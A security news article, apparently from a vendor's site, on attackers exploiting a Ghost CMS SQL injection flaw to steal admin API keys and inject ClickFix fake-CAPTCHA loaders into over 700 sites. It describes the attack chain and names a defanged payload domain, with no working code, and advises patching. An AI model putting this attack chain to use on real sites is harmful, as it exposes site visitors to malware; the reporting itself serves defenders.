Ghost CMS CVE-2026-26980 Exploited: 700+ Sites Hit in ClickFix Attacks

Threat actors are actively exploiting a critical SQL injection vulnerability in Ghost CMS (CVE-2026-26980, CVSS 9.4) to compromise over 700 websites across multiple sectors including universities, blockchain, AI, SaaS, security research, media, and financial technology. QiAnXin XLab researchers discovered the campaign, which was first detected on May 7, 2026, and involves attackers leveraging the flaw in Ghost's Content API to steal admin API keys without authorization. The vulnerability, initially discovered by Anthropic using Claude and patched in February 2026 in version 6.19.1, enables unauthenticated attackers to read arbitrary database data and subsequently modify published content.

The attack chain involves obtaining the target site's Admin API Key, then using Ghost's Admin API to inject malicious JavaScript loaders at the bottom of pages en masse. This "large-scale poisoning" campaign facilitates ClickFix attacks, where visitors encounter fake CAPTCHA prompts designed to trick them into executing malicious actions. The injected JavaScript functions as a two-stage loader, retrieving the main payload at runtime from the external domain clo4shara[.]xyz/11z77u3.php. Security teams investigating potential exposure can use tools like our browser fingerprint test to detect if their browser environment has been profiled by such attack infrastructure.

The PHP payload server is powered by Adspect, a commercial cloaking service that collects browser fingerprinting data and delivers instructions based on the victim's characteristics. This technique ensures only genuine human visitors receive the malicious payload while security scanners and crawlers see benign content. The script supports 19 different commands for remote control and various actions including redirection, popups, and file downloads. Organizations running Ghost CMS instances should immediately update to version 6.19.1 or later and audit their admin API keys for potential compromise. Users concerned about whether their credentials may have been exposed in related breaches can utilize our email breach checker to verify their exposure status.